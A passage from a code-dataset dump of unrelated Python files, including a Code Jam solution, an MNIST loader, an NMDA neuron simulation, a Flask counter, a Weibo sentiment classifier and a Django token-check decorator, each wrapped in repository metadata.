re.findall(r'-(?:w|h)[0-9]+', raw_params_string[-1])\n result['name'] = filename.replace(raw_params_string[-1], '')\n raw_params.reverse()\n for param in raw_params:\n if param[1] == 'w' and result['width'] is None:\n result['width'] = int(param[2:])\n if param[1] == 'h' and result['height'] is None:\n result['height'] = int(param[2:])\n return result","sub_path":"app/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"601076463","text":"from decorator import decorator\nfrom line_profiler import LineProfiler\n\n@decorator\ndef profile_each_line(func, *args, **kwargs):\n profiler = LineProfiler()\n profiled_func = profiler(func)\n try:\n profiled_func(*args, **kwargs)\n finally:\n profiler.print_stats()","sub_path":"all-gists/6583590/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"220460205","text":"#!/usr/bin/env python3\n\nTEST = 'large'\nIN = 'A-{}.in'.format(TEST)\nOUT = 'A-{}.out'.format(TEST)\n\nq = {\n 'P': ('P', 'R'),\n 'R': ('R', 'S'),\n 'S': ('P', 'S'),\n}\n\ndef plan(n, ch):\n if n == 0:\n return ch, int(ch == 'R'), int(ch == 'P'), int(ch == 'S')\n a, ra, pa, sa = plan(n-1, q[ch][0])\n b, rb, pb, sb = plan(n-1, q[ch][1])\n return min(a + b, b + a), ra + rb, pa + pb, sa + sb\n\n\ndef good_plans(n, r, p, s):\n for c in q.keys():\n pl, pr, pp, ps = plan(n, c)\n if (pr, pp, ps) == (r, p, s):\n yield pl\n\ndef run(n, r, p, s):\n return min(good_plans(n, r, p, s), default='IMPOSSIBLE')\n\n\ndef main():\n with open(IN) as fin, open(OUT, 'w') as fout:\n t = int(fin.readline().strip())\n for i in range(t):\n n, r, p, s = map(int, fin.readline().split())\n res = run(n, r, p, s)\n print('Case #{}: {}'.format(i + 1, res), file=fout)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"codes/BuildLinks1.10/test_input/CodeJam/2A/python/Vytis_A.py","file_name":"Vytis_A.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"501540928","text":"\"\"\"Computes the loss for a batch and applies updates.\"\"\"\nfrom typing import Any, Dict, List\n\nimport torch\n\nfrom agent.learning import auxiliary\nfrom agent.model.model_wrappers import model_wrapper\n\n\ndef apply_batch_loss(model: model_wrapper.ModelWrapper, examples: List[Any], optimizer: torch.optim.Optimizer):\n \"\"\" Trains a batch for a model with auxiliary losses. \"\"\"\n optimizer.zero_grad()\n\n # Compute the main loss and auxiliary losses\n main_loss, auxiliary_losses = model.loss(examples)\n\n total_loss = main_loss\n\n # Apply the auxiliary losses\n auxiliary_coefficients: Dict[auxiliary.Auxiliary, float] = model.get_auxiliaries()\n\n for aux_type, coefficient in auxiliary_coefficients.items():\n total_loss += coefficient * auxiliary_losses[aux_type]\n\n total_loss.backward()\n optimizer.step()\n\n return total_loss.item(), main_loss, auxiliary_losses\n","sub_path":"agent/learning/batch_loss.py","file_name":"batch_loss.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"242112399","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Nov 5 17:18:48 2020\r\n\r\n@author: Naman\r\n\"\"\"\r\n\r\nimport random as r\r\n\r\ndef randGenerator(n,m):\r\n arr = []\r\n for i in range(n):\r\n array = []\r\n for j in range(m):\r\n array.append(r.choice([0,1]))\r\n arr.append(array)\r\n return arr\r\n\r\ndef printing(arr,n,m,a,b):\r\n for i in range(n):\r\n for j in range(m):\r\n if a==i and b==j and b==0:\r\n if j==0:\r\n print(\"\", end=\"\")\r\n print(\"<\",end=\"\")\r\n print(arr[i][j], end=\"> \")\r\n \r\n elif a == i and b == j+1:\r\n if j==0:\r\n print(\" \", end=\"\")\r\n print(arr[i][j], end=\" <\")\r\n elif a == i and b == j:\r\n if j==0:\r\n print(\" \", end=\"\")\r\n print(arr[i][j], end=\"> \")\r\n else:\r\n if j==0:\r\n print(\" \", end=\"\")\r\n print(arr[i][j], end=\" \")\r\n print()\r\n \r\ndef cleaner(arr,n,m):\r\n pos = 0;\r\n for i in range(n):\r\n if pos==0:\r\n for j in range(m):\r\n pos = j\r\n printing(arr = arr, n = n, m = m, a = i, b = j)\r\n if arr[i][j] == 1:\r\n print(\"Percepting Dirt....CLeaning....moving ahead\")\r\n arr[i][j]=0\r\n else:\r\n print(\"Already clean....moving ahead\")\r\n else:\r\n for j in range(m):\r\n pos = m-j-1;\r\n printing(arr = arr, n = n, m = m, a = i, b = m -j -1)\r\n if arr[i][m-j-1] == 1:\r\n print(\"Percepting Dirt....CLeaning....moving ahead\")\r\n arr[i][m -j -1]=0\r\n else:\r\n print(\"Already clean....moving ahead\")\r\n \r\n \r\ndef main():\r\n print(\"Enter the values of: \")\r\n n=int(input(\"N = \"))\r\n m=int(input(\"M = \"))\r\n arr = randGenerator(n = n, m = m)\r\n #printing(arr = arr, n = n, m = m,a=1,b=0)\r\n cleaner(arr=arr, n = n, m=m)\r\n print()\r\n printing(arr = arr, n = n, m = m, a = n+1, b = m+1)\r\n print(\"Everything Cleaned\")\r\nmain()\r\n ","sub_path":"Lab - 5_VacuumCleaner.py","file_name":"Lab - 5_VacuumCleaner.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"211249817","text":"import pandas as pd \n\n\nAUCTION_FILENAME = 'data/static/wayne_county_auction_list_10152019/reach_auction_list.csv'\nMAIN_REACH_FILENAME = 'data/processed/10212019/reach_webhook.csv'\nFINAL_FILENAME = 'data/static/wayne_county_auction_list_10152019/main_reach_with_auction.csv'\n\n\ndef main():\n\n\tauction_data = pd.read_csv(AUCTION_FILENAME)\n\tmain_reach_data = pd.read_csv(MAIN_REACH_FILENAME)\n\n\tmerged_data = pd.merge(main_reach_data, auction_data, on='address')\n\n\tmerged_data.to_csv(FINAL_FILENAME)\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"processors/non_recurring/reach_auction_join_main.py","file_name":"reach_auction_join_main.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"307655799","text":"from imbuild.utils import obtain_parameters, optional, requirement\nfrom imbuild.collection import Collection\nfrom imbuild.dependency import create_dependency\nfrom imbuild.rule import Rule\nfrom os.path import basename, dirname\nfrom subprocess import call\nimport shutil\n\n\nclass QTModule:\n def __init__(self, name):\n self.name = name\n\n\nQOBJECT_PARAMETERS = [\n optional('sources', []),\n requirement('moc_source_dir'),\n optional('includes', [])\n]\n\n\ndef remove_ext(x):\n return basename(x).split('.')[0]\n\n\ndef get_dirname(x):\n return dirname(x)\n\n\ndef moc_source_location_transform(x):\n return f'{dirname(x)}/moc/moc_{remove_ext(x)}.cpp'\n\n\ndef moc_files(QT_DIR, files, transform=moc_source_location_transform):\n for f in files:\n call([QT_DIR + '/bin/moc', f, '-o', transform(f)])\n\n\ndef create_qobject_collection(QT_DIR, **kwargs):\n args = obtain_parameters(kwargs, QOBJECT_PARAMETERS)\n moc = Rule(name='moc', command=f'{QT_DIR}/bin/moc $in -o $out', description=\"MOC $in to $out\")\n\n moc_files = Collection(moc, args.sources, args.moc_source_dir)\n moc_files.store = args\n moc_files.set_output_transform(moc_source_location_transform)\n return moc_files\n\n\ndef lib_to_define(name):\n content = name.replace('Qt', '').upper()\n return f'QT_{content}_LIB'\n\n\ndef qt_dependency(QT_DIR, *args):\n qt_inc = QT_DIR + 'include/'\n qt_libd = QT_DIR + 'lib/'\n\n dep = create_dependency(includes=[qt_inc],\n libdirs=[qt_libd],\n links=[],\n defines=[])\n for arg in args:\n if type(arg) is QTModule:\n dep.includes.append(qt_inc + arg.name)\n dep.links.append(arg.name.replace('Qt', 'Qt5'))\n dep.defines.append(lib_to_define(arg.name))\n return dep\n\n\ndef qt_copy_dependencies(QT_DIR, qt_dep, binary_dir, posfix=''):\n qt_bin_dir = QT_DIR + 'bin/'\n for links in qt_dep.links:\n target_name = qt_bin_dir + links + posfix + '.dll'\n shutil.copy(target_name, binary_dir)\n","sub_path":"imbuild/external/qt.py","file_name":"qt.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"650896994","text":"#Hierarchically indexed data\n\nimport pandas as pd\nimport numpy as np\n\ndf1 = pd.DataFrame({'key1': ['MH', 'MH', 'MH','TN','TN'],\n 'key2': [2000,2001,2002,2001,2002],\n 'lqty': [3,2,5,6,9]})\ndf2 = pd.DataFrame(np.arange(12).reshape((6,2)),index=[['TN','TN','MH','MH','MH','MH'],\n [2000,2000,2000,2000,2001,2002]],\n columns=['event1','event2'])\n\n#print(df2)\n#print(df2.loc['TN']) # returns all entries under TN\n#print(df2.loc['TN'].loc[2000]) # returns only those entries with TN and 2000\n\n#print(pd.merge(df1,df2,left_on=['key1','key2'], right_index=True))","sub_path":"python_training/samp_proj1/day_011118/d_wrangling3.py","file_name":"d_wrangling3.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"412205774","text":"import numpy as np\nfrom neuron import h\n\nimport neat\nfrom neat import NeuronSimTree, MorphLoc\n\nimport copy\n\n\n# simulation\nT_MAX = 300.\nDT = 0.1\n# EXPERIMENT\nDELTA_T = 20. # ms\nT0 = 60. # ms\n# physiology\nEL = -75. # mV\n\n# AMPA synapse parameters\nTAU_AMPA = 2. # ms\n# NMDA synapse parameters\nE_REV_NMDA = 5. # mV\nC_MG = 1. # mM\nDUR_REL = 0.5 # ms\nAMP_REL = 2. # mM\n\n\ndef calcAmpWidthSurface(v_arr, t0, dt=DT, teps=3.):\n \"\"\"\n compute amplitude, width and surface of NMDA spike from voltage trace\n \"\"\"\n i0 = int(t0/dt)\n i_ = int(teps/dt)\n v_eq = v_arr[0]\n\n amp = np.max(v_arr[i0+i_:]) - v_eq\n width = dt * np.where(v_arr[i0:] > (amp/2.+ v_eq))[0][-1]\n surf = dt * (np.sum(v_arr[i0:] - v_eq))\n\n return amp, width, surf\n\n\ndef subtractAP(v_m, v_ap, ix_spike, ix_loc):\n \"\"\"\n Subtracts AP waveform in `v_ap` from AP waveform in `v_m`. Waveforms are\n aligned at the peak.\n\n `ix_spike` gives first and last index of window in which spike occured\n `ix_loc` gives location where peak time is measured\n \"\"\"\n\n i_peak_m = ix_spike[0] + np.argmax(v_m[ix_loc, ix_spike[0]:ix_spike[1]])\n i_peak_ap = np.argmax(v_ap[ix_loc])\n\n i0 = i_peak_m - i_peak_ap\n i1 = i0 + len(v_ap[ix_loc])\n i2 = min(len(v_m[ix_loc])-i0, len(v_ap[ix_loc]))\n\n v_m_ = copy.deepcopy(v_m)\n v_m_[:,i0:i1] -= v_ap[:,:i2]\n\n return v_m_\n\n\ndef deviationThrFromLinear(arr, f_eps=1.2):\n \"\"\"\n Compute the threshold by finding where it has deviated by more than a factor\n `f_eps` from linear.\n \"\"\"\n assert len(arr) > 2\n\n x_arr = np.arange(len(arr))\n\n import sklearn.linear_model as lm\n lr = lm.LinearRegression()\n lr.fit(x_arr[:,None], arr, np.exp(-x_arr))\n f_arr = lr.coef_[0] * x_arr + lr.intercept_\n\n try:\n ix_max = np.where((arr[1:]-f_arr[0]) > f_eps * (f_arr[1:]-f_arr[0]))[0][0]\n ix_max += 1\n except IndexError:\n ix_max = len(arr)-1\n\n return ix_max\n\n\nclass NMDASimTree(NeuronSimTree):\n def __init__(self, **kwargs):\n super(NMDASimTree, self).__init__(**kwargs)\n\n self.pres = []\n self.nmdas = []\n\n def deleteModel(self):\n super(NMDASimTree, self).deleteModel()\n self.pres = []\n self.nmdas = []\n\n def addAMPASynapse(self, loc, g_max, tau):\n loc = MorphLoc(loc, self)\n # create the synapse\n syn = h.AlphaSynapse(self.sections[loc['node']](loc['x']))\n syn.tau = tau\n syn.gmax = g_max\n # store the synapse\n self.syns.append(syn)\n\n return len(self.syns)-1\n\n def addNMDASynapse(self, loc, g_max, e_rev, c_mg, dur_rel, amp_rel):\n loc = MorphLoc(loc, self)\n # create the synapse\n syn = h.NMDA_Mg_T(self.sections[loc['node']](loc['x']))\n syn.gmax = g_max\n syn.Erev = e_rev\n syn.mg = c_mg\n # create the presynaptic segment for release\n pre = h.Section(name='pre %d'%len(self.pres))\n pre.insert('release_BMK')\n pre(0.5).release_BMK.dur = dur_rel\n pre(0.5).release_BMK.amp = amp_rel\n # connect\n h.setpointer(pre(0.5).release_BMK._ref_T, 'C', syn)\n # store the synapse\n self.nmdas.append(syn)\n self.pres.append(pre)\n\n return len(self.nmdas) - 1\n\n def setSpikeTime(self, syn_index_ampa, syn_index_nmda, spike_time):\n spk_tm = spike_time + self.t_calibrate\n # add spike for AMPA synapse\n self.syns[syn_index_ampa].onset = spk_tm\n # add spike for NMDA synapse\n self.pres[syn_index_nmda](0.5).release_BMK.delay = spk_tm\n\n def addCombinedSynapse(self, loc, g_max_ampa, g_max_nmda):\n global TAU_AMPA, E_REV_NMDA, C_MG, DUR_REL, AMP_REL\n # ampa synapse\n syn_idx_ampa = self.addAMPASynapse(loc, g_max_ampa, TAU_AMPA)\n # nmda synapse\n syn_idx_nmda = self.addNMDASynapse(loc, g_max_nmda, E_REV_NMDA, C_MG, DUR_REL, AMP_REL)\n\n return syn_idx_ampa, syn_idx_nmda\n\n def setActivation(self, loc, n_syn, g_max_ampa, g_max_nmda, t0=T0, delta_t=DELTA_T):\n for ii in range(n_syn):\n syn_idx_ampa, syn_idx_nmda = self.addCombinedSynapse(loc, g_max_ampa, g_max_nmda)\n self.setSpikeTime(syn_idx_ampa, syn_idx_nmda, t0)\n for ii in range(n_syn):\n syn_idx_ampa, syn_idx_nmda = self.addCombinedSynapse(loc, g_max_ampa, g_max_nmda)\n self.setSpikeTime(syn_idx_ampa, syn_idx_nmda, t0+delta_t)\n\n @neat.trees.morphtree.computationalTreetypeDecorator\n def runExperiment(self, loc, g_max_ampa, g_max_nmda, n_syn=10, with_ap=False, delta_t=0., loc_=None, n_syn_=20):\n \"\"\"\n Simulate the experiment with `n_syn` synapses at `loc`\n\n `with_ap` as ``True`` elicits ap with strong current pulse at soma\n \"\"\"\n global EL, T_MAX, DT, T0, DELTA_T\n loc = MorphLoc(loc, self)\n\n self.initModel(dt=DT, t_calibrate=200., v_init=EL, factor_lambda=1.)\n # add the synapses\n self.setActivation(loc, n_syn, g_max_ampa, g_max_nmda, t0=T0)\n if loc_ is not None:\n loc_ = MorphLoc(loc_, self)\n self.setActivation(loc_, n_syn_, g_max_ampa, g_max_nmda, t0=T0-DELTA_T)\n # add current clap\n if with_ap:\n self.addIClamp((1,.5), 4., T0+delta_t, 1.)\n # set recording locs\n rec_locs = [(1, .5), loc]\n if loc_ is not None:\n rec_locs.append(loc_)\n self.storeLocs(rec_locs, name='rec locs')\n # run the simulation\n res = self.run(T_MAX, pprint=True)\n # delete the model\n self.deleteModel()\n\n return res\n\n def extractAP(self, loc, delta_t=0):\n \"\"\"\n Extract action potential waveform\n \"\"\"\n res_ap = self.runExperiment(loc, n_syn=0, with_ap=True, delta_t=delta_t)\n v_ap = res_ap['v_m'] - res_ap['v_m'][:,0:1]\n\n i0 = int(T0/DT)\n i1 = int(200/DT) + i0\n\n return v_ap[:,i0:i1]\n\n def findNMDAThreshold(self, loc, n_syns, g_max_ampa, g_max_nmda, delta_t=0.,\n with_TTX=False, with_ap=False, at_soma=False, pplot=False,\n loc_=None, n_syn_=20):\n \"\"\"\n Extrac nmda spike threshold\n\n Returns\n -------\n n_syn_thr: int\n threshold number of synapses to activate\n res_nmda: dict of np.ndarray\n contains 'amp', 'width' and 'surf' of waveform elicited by second\n stimulus for each activation level\n res_sim: list of dict\n contains the voltage traces for each simulation\n at_soma: bool\n If ``True``, the threshold is measured at the soma. Otherwise at\n the dendritic synapse.\n \"\"\"\n global T0, DELTA_T, DT\n assert 0 not in n_syns\n\n lll = MorphLoc(loc, self)\n print(\"\\n--> Distance to soma = %.2f um \\n\"%self.distancesToSoma([lll])[0])\n\n if with_TTX:\n self.addTTX()\n\n ix_thr = 0 if at_soma else 1\n # extract baseline AP\n if with_ap:\n v_ap = self.extractAP(loc)\n ix_spike = (int((T0+delta_t)/DT), int((T0+delta_t+5.)/DT))\n\n res_sim = []\n res_nmda = {'amp': [],\n 'width': [],\n 'surf': []}\n for nn in n_syns:\n res = self.runExperiment(loc, g_max_ampa, g_max_nmda, n_syn=nn, delta_t=delta_t,\n with_ap=with_ap, loc_=loc_, n_syn_=n_syn_)\n if with_ap:\n res['v_m_'] = subtractAP(res['v_m'], v_ap, ix_spike, ix_thr)\n else:\n res['v_m_'] = copy.deepcopy(res['v_m'])\n res_sim.append(res)\n\n amp, width, surf = calcAmpWidthSurface(res['v_m_'][ix_thr], T0+DELTA_T, dt=DT)\n res_nmda['amp'].append(amp)\n res_nmda['width'].append(width)\n res_nmda['surf'].append(surf)\n\n if pplot:\n pl.figure()\n ax = pl.subplot(121)\n ax.set_title('soma')\n ax.plot(res['t'], res['v_m'][0], 'b')\n ax.plot(res['t'], res['v_m_'][0], 'r--')\n\n ax = pl.subplot(122)\n ax.set_title('dend')\n ax.plot(res['t'], res['v_m'][1], 'b')\n ax.plot(res['t'], res['v_m_'][1], 'r--')\n\n pl.show()\n\n for key, val in res_nmda.items(): res_nmda[key] = np.array(val)\n\n # nmda threshold as steepest surface increase\n n_syn_thr = deviationThrFromLinear(res_nmda['surf'])\n\n return n_syn_thr, res_nmda, res_sim","sub_path":"nmda.py","file_name":"nmda.py","file_ext":"py","file_size_in_byte":8563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"495578706","text":"import FWCore.ParameterSet.Config as cms\n\n#\n# Ecal part\n#\nfrom RecoLocalCalo.Configuration.ecalLocalRecoSequenceCosmics_cff import *\nfrom RecoLocalCalo.EcalRecAlgos.EcalSeverityLevelESProducer_cfi import *\n\n#defines a sequence ecalLocalRecoSequence\n#\n# Hcal part\n#\n# calo geometry\n#\n# changed by tommaso. now the calibrations are read from Configuration/StaqndardSequences/data/*Conditions.cff\n#\n# HCAL calibrations\n#include \"CalibCalorimetry/HcalPlugins/data/hardwired_conditions.cfi\"\n#HCAL reconstruction\nfrom RecoLocalCalo.Configuration.hcalLocalReco_cff import *\n#\n# sequence CaloLocalReco and CaloGlobalReco\n#\ncalolocalrecoCosmics = cms.Sequence(ecalLocalRecoSequenceCosmics+hcalLocalRecoSequence)\nhbheprereco.puCorrMethod = 0 \nhbheprereco.firstSample = 0\nhbheprereco.samplesToAdd = 10\nhbheprereco.correctForTimeslew = False\nhbheprereco.correctForPhaseContainment = False\nhoreco.firstSample = 0\nhoreco.samplesToAdd = 10\nhoreco.correctForTimeslew = False\nhoreco.correctForPhaseContainment = False\nhfreco.firstSample = 0\nhfreco.samplesToAdd = 10 ### min(10,size) in the algo\nhfreco.correctForTimeslew = False\nhfreco.correctForPhaseContainment = False\n#--- special temporary DB-usage unsetting \nhbheprereco.tsFromDB = False\nhfreco.tsFromDB = False\nhoreco.tsFromDB = False\nhfreco.digiTimeFromDB = False\nhbheprereco.recoParamsFromDB = cms.bool(False)\nhoreco.recoParamsFromDB = cms.bool(False)\nhfreco.recoParamsFromDB = cms.bool(False)\n#zdcreco.firstSample = 1\n#zdcreco.samplesToAdd = 8\nzdcreco.correctForTimeslew = True\nzdcreco.correctForPhaseContainment = True\nzdcreco.correctionPhaseNS = 10.\n#caloglobalreco = cms.Sequence(hcalGlobalRecoSequence)\n\n#\n# R.Ofierzynski (29.Oct.2009): add NZS sequence\n#\nfrom RecoLocalCalo.Configuration.hcalLocalRecoNZS_cff import *\ncalolocalrecoCosmicsNZS = cms.Sequence(ecalLocalRecoSequenceCosmics+hcalLocalRecoSequence+hcalLocalRecoSequenceNZS) \n","sub_path":"RecoLocalCalo/Configuration/python/RecoLocalCalo_Cosmics_cff.py","file_name":"RecoLocalCalo_Cosmics_cff.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"132834204","text":"from flask import Flask, render_template, session, redirect\napp = Flask(__name__)\napp.secret_key= 'akfnmbvdbmdgbp'\n\n\n\n@app.route('/')\ndef counter():\n \n if 'count' not in session:\n session['count'] = 0\n else:\n session['count'] += 1\n \n \n \n \n return render_template('index.html', count = session ['count'])\n\n\n\n@app.route('/destroy_session')\ndef destroy_session():\n session.clear()\n\n return redirect('/')\n\n\n\n\n\n\nif __name__==\"__main__\": \n app.run(debug=True)\n\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"619247419","text":"import sys\nsys.path.append('..')\n\nimport numpy as np\nimport os\n\ndef mnist(data_dir):\n fd = open(os.path.join(data_dir,'train-images-idx3-ubyte'))\n loaded = np.fromfile(file=fd,dtype=np.uint8)\n trX = loaded[16:].reshape((60000,28*28)).astype(float)\n\n fd = open(os.path.join(data_dir,'train-labels-idx1-ubyte'))\n loaded = np.fromfile(file=fd,dtype=np.uint8)\n trY = loaded[8:].reshape((60000))\n\n fd = open(os.path.join(data_dir,'t10k-images-idx3-ubyte'))\n loaded = np.fromfile(file=fd,dtype=np.uint8)\n teX = loaded[16:].reshape((10000,28*28)).astype(float)\n\n fd = open(os.path.join(data_dir,'t10k-labels-idx1-ubyte'))\n loaded = np.fromfile(file=fd,dtype=np.uint8)\n teY = loaded[8:].reshape((10000))\n\n trY = np.asarray(trY)\n teY = np.asarray(teY)\n\n return trX, teX, trY, teY\n\ndef mnist_with_valid_set(percentage, data_dir):\n trX, teX, trY, teY = mnist(data_dir)\n\n train_inds = np.arange(len(trX))\n np.random.shuffle(train_inds)\n trX = trX[train_inds]\n trY = trY[train_inds]\n #trX, trY = shuffle(trX, trY)\n n = 60000\n border = int(n*percentage)\n vaX = trX[border:]\n vaY = trY[border:]\n trX = trX[:border]\n trY = trY[:border]\n\n np.savetxt('train_inds.csv', train_inds)\n np.savetxt('percentage.csv', [percentage])\n\n return trX, vaX, teX, trY, vaY, teY\n\n\ndef load_mnist_with_valid_set(train_inds, percentage, data_dir):\n trX, teX, trY, teY = mnist(data_dir)\n\n trX = trX[train_inds]\n trY = trY[train_inds]\n #trX, trY = shuffle(trX, trY)\n n = 60000\n border = int(n*percentage)\n vaX = trX[border:]\n vaY = trY[border:]\n trX = trX[:border]\n trY = trY[:border]\n\n return trX, vaX, teX, trY, vaY, teY\n","sub_path":"Monte-Carlo-Attacks/Monte-Carlo-MNIST_GAN/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"233529705","text":"# -*- coding:utf-8 -*-\nimport os\n\nfrom sklearn import metrics\n\nimport numpy as np\nimport pandas as pd\nimport jieba\nimport re\nfrom gensim.models import word2vec\nimport math\nfrom sklearn.externals import joblib\n\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.ensemble import GradientBoostingClassifier\n\ndataset_path = ('./dataset')\n# 原始数据的csv文件\noutput_text_filename = 'raw_weibo_text.csv'\n# 清洗好后的csv文件\noutput_cln_text_filename = 'clean_weibo_text.csv'\n\n\ndef proc_text(raw_line):\n # 使用正则表达式去除非中文字符\n filter_pattern = re.compile('[^\\u4E00-\\u9FD5]+')\n chinese_only = filter_pattern.sub('', raw_line)\n\n words = []\n for word in chinese_only:\n words.append(word)\n\n return ' '.join(words)\n return featureVec\n\ndef split_train_test(text_df, size=0.8):\n \"\"\"\n 分割训练集和测试集\n \"\"\"\n # 为保证每个类中的数据能在训练集中和测试集中的比例相同,所以需要依次对每个类进行处理\n train_text_df = pd.DataFrame()\n test_text_df = pd.DataFrame()\n\n labels = [0, 1, 2, 3]\n for label in labels:\n # 找出label的记录\n text_df_w_label = text_df[text_df['labels'] == label]\n # 重新设置索引,保证每个类的记录是从0开始索引,方便之后的拆分\n text_df_w_label = text_df_w_label.reset_index()\n\n # 默认按80%训练集,20%测试集分割\n\n # 该类数据的行数\n n_lines = text_df_w_label.shape[0]\n split_line_no = math.floor(n_lines * size)\n text_df_w_label_train = text_df_w_label.iloc[:split_line_no, :]\n text_df_w_label_test = text_df_w_label.iloc[split_line_no:, :]\n\n # 放入整体训练集,测试集中\n train_text_df = train_text_df.append(text_df_w_label_train)\n test_text_df = test_text_df.append(text_df_w_label_test)\n\n train_text_df = train_text_df.reset_index()\n test_text_df = test_text_df.reset_index()\n return train_text_df, test_text_df\n\n\nprint('加载处理好的文本数据')\nclean_text_df = pd.read_csv(os.path.join(dataset_path, output_cln_text_filename), encoding='utf-8')\ntrain_text_df, test_text_df = split_train_test(clean_text_df)\nprint('训练集中各类数据的个数:', train_text_df.groupby('labels').size())\nprint('测试集中各类数据的个数:', test_text_df.groupby('labels').size())\n\n# 特征提取\n# 把训练集变成句子列表\n\ntrain=train_text_df['text']\ntf=TfidfVectorizer()\nX_train=tf.fit_transform(train)\nY_train = train_text_df['labels']\nprint(Y_train)\n\n\ngs=MultinomialNB()\ngs.fit(X_train, Y_train)\n\n\njoblib.dump(gs,'gs.m')\n\n\nstopwords = [line.rstrip() for line in open('中文停用词库.txt', 'r', encoding='utf-8')]\nwith open('微博评论/李小璐', 'r', encoding='utf-8') as f:\n lines = f.read().splitlines()\n\n text_series = pd.Series(lines)\n\n# 对文档进行只保留中文处理\ntext = text_series.map(proc_text)\n\nprint(text.head())\n\n# 构建句子列表,并去掉词汇之间的空格\ntext_list = []\nfor row in text:\n row = ''.join(str(row).split())\n text_list.append(str(row))\n\nprint(text_list)\n\n# 对每一句进行分词\ntexts = [[word for word in jieba.cut(doc)] for doc in text_list]\nprint(texts)\n\n# 对每一句进行去除停用词\ntext2 = []\n\nfor text in texts:\n words = []\n for text1 in text:\n if text1 not in stopwords:\n words.append(text1)\n text2.append(words)\nprint(text2)\n\nclf=joblib.load('gs.m')\n\n\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\n\ntest=test_text_df['text']\nword_vec=tf.transform(test)\nprint('开始预测')\nresult=clf.predict(word_vec)\nprint('预测结束')\nr=pd.DataFrame(result)\nr.to_csv('r.csv')\n","sub_path":"model_predict.py","file_name":"model_predict.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"237968772","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/env python\n\nimport logging\nimport json\nimport jwt\nfrom django.http import HttpResponse\nfrom django.utils.timezone import now\nfrom django.utils.timezone import timedelta\nfrom utils.request_utils import EMDBHandler\nfrom backstage.models import TokenModel\nfrom backstage.models import ErrorMessage\nfrom utils.common import save_obj_info\n# 为loggers中定义的名称\nlogger = logging.getLogger(\"vir_manager\")\n\n\ndef save_error_info(request, message):\n \"\"\"\n * desc 报错错误信息近数据库\n * input request 对象 错误信息\n * output None\n \"\"\"\n url = request.get_raw_uri()\n remote_addr = request.META.REMOTE_ADDR\n #user = request.user\n user = \"\"\n args = query_params(request)\n line = ErrorMessage()\n insert_dict = {\n 'url': url,\n 'remote_addr': remote_addr,\n 'user': user,\n 'args': str(args)\n }\n save_obj_info(line, insert_dict)\n\n\ndef check_login():\n def wraps(f):\n def de_ex(request, *args, **kwargs):\n token = request.COOKIES.get('jwttoken', '')\n if not token:\n token = request.META.get('HTTP_TOKEN', '')\n if not token:\n token = request.GET.get('token', '')\n if not token:\n token = request.POST.get('token', '')\n if not token:\n result = {\n \"message\": \"token缺失\",\n \"status\": -1,\n \"data\": {},\n }\n return HttpResponse(json.dumps(result), content_type=\"application/json\")\n else:\n # 检测是否在数据库中存储\n start = now().date()\n db_line = TokenModel.objects.filter(\n token=token, expire_time__gte=start)\n if not db_line:\n # 去sso认证\n emdb_handler = EMDBHandler(token)\n token_info = emdb_handler.verify_token()\n if token_info:\n # 保存已经验证过的token\n decode_info = jwt.decode(token, verify=False)\n setattr(request, 'user_id', decode_info['user_id'])\n setattr(request, 'user_name', decode_info['username'])\n info = {\n 'token': token_info['token'],\n 'user': decode_info['username'],\n 'start_time': start,\n 'expire_time': start + timedelta(hours=2)\n }\n line = TokenModel(**info)\n line.save()\n return f(request, *args, **kwargs)\n else:\n # token 失效\n result = {\n \"message\": \"token过期\",\n \"status\": -1,\n \"data\": {},\n }\n return HttpResponse(json.dumps(result), content_type=\"application/json\")\n return f(request, *args, **kwargs)\n return de_ex\n return wraps\n\n\ndef check_permission(token):\n \"\"\"\n * desc 根据token获取权限列表\n \"\"\"\n try:\n return 1\n except:\n raise Exception('EMDB 权限请求失败')\n return 0\n\n\ndef check_vir_permission(token):\n \"\"\"\n * desc 校验虚拟机的管理操作权限\n * input None\n * output 是否有权限 1 有权限 0 没有权限\n \"\"\"\n try:\n handler = EMDBHandler(token)\n user_perms = handler.get_permission()\n if user_perms['is_super']:\n return 1\n permission = user_perms['permission']\n if 'kvm-option' in permission:\n return 1\n return 0\n except:\n raise Exception('权限校验失败')\n\n\ndef return_json_api():\n \"\"\"\n 